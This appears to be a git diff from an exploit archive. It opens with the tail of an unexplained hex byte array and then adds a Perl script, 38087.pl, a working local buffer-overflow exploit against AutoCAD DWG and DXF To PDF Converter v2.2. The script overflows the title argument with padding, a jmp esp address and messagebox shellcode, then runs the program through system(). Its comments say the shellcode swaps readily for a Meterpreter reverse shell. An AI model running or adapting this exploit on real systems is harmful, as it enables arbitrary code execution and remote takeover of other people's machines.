"\x4b\x66\x4b\x4b\x4b\x4b\x4b\x4c\x2a\xc9\xc2\xde\x2a\xe9\xc3\x4b"
"\x4b\x4b\x4b\x4a\x4b\x4b\x4b\x49\x4b\x4b\x4b\x4b\xe9\xc3\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\xec\x4e\x49\xa7\x8b\xab"
"\x4b\x4b\x4b\x40\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\x53\x53\x2e"
"\xec\xbf\x49\x4f\xec\xa1\x4b\x5b\x8f\x16\x4b\x4b\x48\x45\x53\x2e"
"\xec\xbf\x4a\xb7\x8f\xb6\x4b\x4b\x49\xbd\x8b\x5b\x4b\x4b\x4b\x7e"
"\x8b\x3b\x4b\x4b\x49\xa1\x8f\x34\x4b\x4b\x4b\x64\x8b\x3b\x4b\x4b"
"\x49\xa9\x8f\x34\x4b\x4b\x4b\x60\x8b\x3b\x4b\x4b\x49\x91\x8f\x34"
"\x4b\x4b\x4b\x6c\x8b\x3b\x4b\x4b\x49\x9d\x8f\x34\x4b\x4b\x4b\x68"
"\x8b\x3b\x4b\x4b\x4b\x53\x8f\x34\x4b\x4b\x4b\x54\x8b\x3b\x4b\x4b"
"\x4b\x55\x8f\x34\x4b\x4b\x4b\x50\x51\x37\x8f\x34\x4b\x4b\x4b\x52"
"\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x5e\xec\x4e\x4b\x5f"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xb6\x4b\x4b\x49\xe4\x8b\x5b\x4b\x4b"
"\x4b\x61\x8b\x3b\xb4\xb4\xb4\xac\x8f\x34\x4b\x4b\x4b\x6f\x8b\x3b"
"\x4b\x4b\x4b\x54\x8f\x34\x4b\x4b\x4b\x6b\x8b\x3b\x4b\x4b\x49\xf8"
"\x8f\x34\x4b\x4b\x4b\x57\x8b\x3b\x4b\x4b\x4b\x50\x8f\x34\x4b\x4b"
"\x4b\x53\x51\x37\x8f\x34\x4b\x4b\x4b\x5d\x51\x37\xee\x31\xcb\x4b"
"\x8f\x34\x4b\x4b\x4b\x59\xec\x4e\x4b\x5a\x4b\x4b\x4b\x4b\x4b\x5b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\x53\xb7\x8f\x26\xb4\xb4"
"\xb4\xb3\xa7\x2c\x49\x1a\x4b\x35\x8f\xb6\x4b\x4b\x49\x3b\x8b\x5b"
"\x4b\x4b\x4b\x6a\x8b\x3b\xb4\xb4\xb4\xed\x8f\x34\x4b\x4b\x4b\x50"
"\x8b\x3b\x4b\x4b\x49\x13\x8f\x34\x4b\x4b\x4b\x5c\x8b\x3b\x4b\x4b"
"\x4b\x5d\x8f\x34\x4b\x4b\x4b\x58\x51\x37\x8f\x34\x4b\x4b\x4b\x5a"
"\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x46\xec\x4e\x4b\x47"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xb6\x4b\x4b\x49\x08\x8b\x5b\x4b\x4b"
"\x4b\x7d\x8b\x3b\xb4\xb4\xb4\x3c\x8f\x34\x4b\x4b\x4b\x7b\x8b\x3b"
"\x4b\x4b\x4b\x62\x8f\x34\x4b\x4b\x4b\x67\x8b\x3b\x4b\x4b\x4b\x50"
"\x8f\x34\x4b\x4b\x4b\x63\x8b\x3b\x4b\x4b\x4b\x54\x8f\x34\x4b\x4b"
"\x4b\x6f\x8b\x3b\x4b\x4b\x4b\x68\x8f\x34\x4b\x4b\x4b\x6b\x51\x37"
"\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x57\xec\x4e\x4b\x50\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x5b\x49\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8b\xab\x4b\x4b\x4b\x47\x0a\x6b\x4b\x4f\x8f\x16\xb4\xb4"
"\xb4\xa7\xec\x23\x4b\x4c\xec\xbf\x4b\xba\xec\xa1\x4b\x59\x8f\x16"
"\x4b\x4b\x4a\xb2\xec\x23\x4b\x4d\xec\xbf\x4b\xa3\x8b\x1b\xb4\xb4"
"\xb4\x97\x8b\x3b\x4b\x4b\x4b\x47\xec\xae\x4b\x50\xec\xae\x4a\x22"
"\x8b\x1b\x4b\x4b\x4a\xa5\xec\xae\x4b\xc3\x8b\x1b\x4b\x4b\x4a\xa8"
"\x8b\x3b\xb4\xb4\xb4\xa5\xec\xae\x4b\x47\xec\xae\x4a\xce\x8b\xab"
"\xb4\xb4\xb4\xbd\x8b\x1b\xb4\xb4\xb4\x8b\xec\xbf\x4b\x3d\x8f\xb6"
"\x4b\x4b\x4a\x82\x53\x7c\x8f\xa4\x4b\x4b\x4a\xe4\x8b\x6b\x4b\x4b"
"\x4b\x07\x9c\x4c\x6b\x4b\x6b\x4b\x8b\x6b\x4b\x4b\x4b\x75\x9c\x44"
"\x6b\x4b\x6b\x4b\x8f\x14\x4b\x4b\x4b\x09\x8b\x5b\x4b\x4b\x4b\x74"
"\x8b\x3b\x4b\x4b\x4b\x79\x8f\x34\x4b\x4b\x4b\x60\x8b\x3b\x4b\x4b"
"\x4b\x63\x8f\x34\x4b\x4b\x4b\x7e\x8b\x3b\x4b\x4b\x4a\xd9\x8f\x34"
"\x4b\x4b\x4b\x7a\x8b\x3b\x4b\x4b\x4b\x55\x8f\x34\x4b\x4b\x4b\x66"
"\x8b\x3b\x4b\x4b\x4b\x69\x8f\x34\x4b\x4b\x4b\x62\x8b\x3b\x4b\x4b"
"\x4b\x63\x8f\x34\x4b\x4b\x4b\x6e\x51\x37\xee\x31\xcb\x4b\x8f\x34"
"\x4b\x4b\x4b\x6a\xec\x4e\x4b\x6b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4a\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
"\x69\x69\x69\x69\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xa6\x4b\x4b\x4a\x04\x53\x38\x53\xb2"
"\x8f\x26\xb4\xb4\xb4\xa1\xa7\x29\xab\x4b\x4b\xb5\xa7\x23\x3b\x4b"
"\xb4\xb5\xec\x4e\x4a\x7a\x8f\xb6\x4b\x4b\x4a\x1c\x8f\xa4\x4b\x4b"
"\x4a\x77\x8b\x5b\x4b\x4b\x4b\x7a\x8b\x3b\xb4\xb4\xb4\x85\x8f\x34"
"\x4b\x4b\x4b\x62\x8b\x3b\x4b\x4b\x4b\x6d\x8f\x34\x4b\x4b\x4b\x6c"
"\x8f\x14\x4b\x4b\x4b\x69\x8b\x3b\x4b\x4b\x4a\x60\x8f\x34\x4b\x4b"
"\x4b\x6b\x8b\x3b\xb4\xb4\xb4\x8a\x8f\x34\x4b\x4b\x4b\x57\x51\x37"
"\x8f\x34\x4b\x4b\x4b\x51\x51\x37\x8f\x34\x4b\x4b\x4b\x53\x51\x37"
"\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x5f\xec\x4e\x4b\x58\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8f\xa6\x4b\x4b\x4b\xb2\x8f\x26\xb4\xb4\xb4\xbd\x53\xbd"
"\xa7\x23\x4b\xa9\xb4\x35\x4c\xb5\x8f\xb6\x4b\x4b\x4a\x43\x8f\xa4"
"\x4b\x4b\x4b\xa0\x8b\x5b\x4b\x4b\x4b\x79\x53\x3a\x50\x37\x50\x37"
"\x50\x37\x8f\x14\x4b\x4b\x4b\x6e\x8f\x34\x4b\x4b\x4b\x63\x8f\x64"
"\x4b\x4b\x4b\x6a\x51\x37\x8f\x34\x4b\x4b\x4b\x68\x8f\x24\x4b\x4b"
"\x4b\x57\x51\x37\x8f\x34\x4b\x4b\x4b\x55\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x57\x51\x37\x8f\x34\x4b\x4b\x4b\x51\x51\x37\xee\x31\xcb\x4b"
"\x8f\x34\x4b\x4b\x4b\x5d\xec\x4e\x4b\x5e\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8f\xa6\x4b\x4b\x4b\xe2\x8f\x36\xb4\xb4\xb4\xbd\xa7\x33"
"\x4b\xd8\xb4\x35\x4c\xb5\x8f\xb6\x4b\x4b\x4b\xf0\x8f\xa4\x4b\x4b"
"\x4b\xd7\x8b\x5b\x4b\x4b\x4b\x50\x53\x3a\x8f\x34\x4b\x4b\x4b\x5c"
"\x51\x37\x8f\x34\x4b\x4b\x4b\x5e\x51\x37\x8f\x34\x4b\x4b\x4b\x58"
"\x51\x37\x8f\x34\x4b\x4b\x4b\x5a\x51\x37\xee\x31\xcb\x4b\x8f\x34"
"\x4b\x4b\x4b\x46\xec\x4e\x4b\x47\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\x8f\x26"
"\xb4\xb4\xb4\xb2\xa7\x23\x4b\x2b\xb4\x35\x8f\x16\xb4\xb4\xb4\xa4"
"\x8f\x26\xb4\xb4\xb4\xa5\x8f\xa6\x4b\x4b\x4b\x2c\x4c\xb5\x8b\x5b"
"\xb4\xb4\xb5\xb0\x8f\x06\xb4\xb4\xb4\x4b\x8b\x6b\x4b\x4b\x4b\xcc"
"\xec\xc3\x4b\x5e\xa8\x7b\x5b\x4b\x4b\x3d\x8b\x70\x4b\x4b\x4b\xb4"
"\x52\x73\xec\x3f\x4b\x4d\xec\x23\x4b\xce\xec\xbf\x4b\x45\xa8\x1b"
"\x6b\x4b\x4b\x3d\x8b\x10\x4b\x4b\x4b\xb4\x51\x62\x51\x22\x52\x7e"
"\xec\x3f\xb4\xbc\x50\x22\x09\x2b\x5b\x4b\x51\x52\x50\x02\xec\x3f"
"\xb4\xa8\x4c\xb5\x8f\x06\xb4\xb4\xb5\x93\x8b\x5b\xb4\xb4\xb5\x86"
"\xec\xc3\x4b\xce\x8b\x6b\x4b\x4b\x4b\x11\x50\x62\xa8\x7b\x5b\x4b"
"\x4b\x3d\x8b\x70\x4b\x4b\x4b\xb4\x52\x73\xec\x3f\x4b\x4d\xec\x73"
"\x4b\x2e\xec\xbf\x4b\x42\x51\x68\xa8\x7b\x6b\x4b\x4b\x3d\x8b\x70"
"\x4b\x4b\x4b\xb4\x09\x7b\x5b\x4b\x51\x52\x50\x02\xec\x3f\xb4\xaf"
"\x4c\xb5\x5c\xb4\x8b\x0b\x4b\x4b\x4b\x5b\x1b\xbb\x0b\x4b\x13\x9b"
"\x0b\x4f\xd3\xa7\x9b\x47\x8b\x0b\x4b\x4b\x4b\x4c\x13\xbb\x0b\x4b"
"\x4c\xb5\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4a\x4b\x4b\x4b\x49\x4a\x18\x78\xf7\x4a\x18\x78\xef"
"\x4a\x18\x7c\x5b\x4a\x18\x7d\x7d\x4a\x18\x7d\x23\x4a\x18\x7d\x6f"
"\x4a\x18\x78\x55\x4a\x18\x78\xc1\x4a\x18\x79\x07\x4a\x18\x78\x4d"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x49\x49\x7b\x72\x4b\x4b\x4b\x4b\x01\x02\x03\x9c\x09\x86\x7f\x97"
"\x8d\x8e\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x9d\x0a\x08\x87\x18"
"\x19\x92\x8f\x1c\x1d\x1e\x1f\x80\x81\x82\x83\x84\x85\x17\x1b\x88"
"\x89\x8a\x8b\x8c\x05\x06\x07\x90\x91\x16\x93\x94\x95\x96\x04\x98"
"\x99\x9a\x9b\x14\xff\x9e\x1a\x20\xa0\xe2\xe4\xe0\xe1\xe3\xe5\xe7"
"\xf1\xa2\x2e\x3c\x28\x2b\x7c\x26\xe9\xea\xeb\xe8\xed\xee\xef\xec"
"\xdf\x21\x24\x2a\x29\x3b\x5e\x2d\x2f\xc2\xc4\xc0\xc1\xc3\xc5\xc7"
"\xd1\xa6\x2c\x25\x5f\x3e\x3f\xf8\xc9\xca\xcb\xc8\xcd\xce\xcf\xcc"
"\x60\x3a\x23\x40\x27\x3d\x22\xd8\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\xab\xbb\xf0\xfd\xfe\xb1\xb0\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71"
"\x72\xaa\xba\xe6\xb8\xc6\xa4\xb5\x7e\x73\x74\x75\x76\x77\x78\x79"
"\x7a\xa1\xbf\xd0\x5b\xde\xae\xac\xa3\xa5\xb7\xa9\xa7\xb6\xbc\xbd"
"\xbe\xdd\xa8\xaf\x5d\xb4\xd7\x7b\x41\x42\x43\x44\x45\x46\x47\x48"
"\x49\xad\xf4\xf6\xf2\xf3\xf5\x7d\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51"
"\x52\xb9\xfb\xfc\xf9\xfa\xff\x5c\xf7\x53\x54\x55\x56\x57\x58\x59"
"\x5a\xb2\xd4\xd6\xd2\xd3\xd5\x30\x31\x32\x33\x34\x35\x36\x37\x38"
"\x39\xb3\xdb\xdc\xd9\xda\x9f\xf0";

20
platforms/win64/dos/38085.pl Executable file
View file

File diff suppressed because one or more lines are too long

48
platforms/windows/local/38087.pl Executable file
View file

@ -0,0 +1,48 @@
#*************************************************************************************************************
#
# Exploit Title: AutoCAD DWG and DXF To PDF Converter v2.2 Buffer Overflow
# Date: 9-5-2015
# Software Link: http://www.verypdf.com/autocad-dwg-dxf-to-pdf/dwg_dxf_to_pdf_setup.exe
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# The title parameter passed into the program that specifies the title of the converted PDF is vulnerable to a buffer overflow.
# This can be exploited using EIP direct overwrite, SEH bypass, and ROP.
# EIP was easier and afforded more universal exploitation so I went that route after SEH bypass limited the exploit's universal OS compatibility
# Enjoy! (Proofs included)
#
# Instructions: Run this as-is (if on x64 platform) and hit the [try] button when the program opens.
#
#**************************************************************************************************************
#standard messagebox shellcode.
#Adapts readily to windows/meterpreter/reverse_tcp using msfvenom --smallest
my $shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
open(myfile,'>crasher.dwf'); #generate the dummy DWF file
print myfile "yattayattayatta"; #gibberish to go in file
close (myfile); #close the file
$sploit=pack('V',0x100126db); #jmp esp specific to Windows 7 x64 [found within the packed section of the executable :) ]
$cmd='"C:\\Program Files (x86)\\AutoCAD DWG and DXF To PDF Converter v2.2\\dwg2pdf.exe"'; #change this if you are on a 32-bit based processor
$cmd .= ' -t "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAargvbhewthvboiwetuhnvoehntoeqothnogobtehnvohjnoeqhngovenhjotgvnoehnogveoqnvobeqntgoh2io4gh894gh942h9gth249h92hg49h2g9h429gh4g9h429hg9th4g9h489gh849hg894h982hg984hg98h4298hg9842hg8942hg8942h298hg4298hg8942hg894hg9hg398gh78358h35g3h8352g8h32h5g8v3ig25bgb3958v938g983h98g3h9gh3259hg3529gh93vbh98v893hg89h5329g8h3598gth93vb583gfb9358fb929b3g29b8g25389bg2538b9g5238b952g38bg925gb28958b925v89bcc88r2cxnbx2rnb982c552b89c25vb8725vg852v8528g52g8258787g5g87253g8723487gfc32g87c23g78c23g78cg387cg7823c2g837cg738cg7853S25hg532gfh3295g8h83295gtf352tu539t8u3529tg5938gt932ut235yt9235yt98325yt92358yv8935vy8953vy5239vy293v8y352v98y32895vy9352yv932yv9y329vy239vy9325y298fy92358fy9253fn53ngj25ngn53n53ngln235lgn2l35ngl235ng3ljnghln3hg239hbu390gu23905ug935guy92835ut893ug9u39gvu935ugvb8953u938ug9835y2395fy2398fy9325fy9325yf932yf9y2359f2359fy2395vy598vy5392vy2395vy3295yv9358yv39258vy9238yv9235hgt9h23g59h23';
$cmd .= $sploit;
$cmd .= $shellcode;
$cmd .= '" -i crasher.dwf -o test.pdf'; # append our arguments to the end
system($cmd);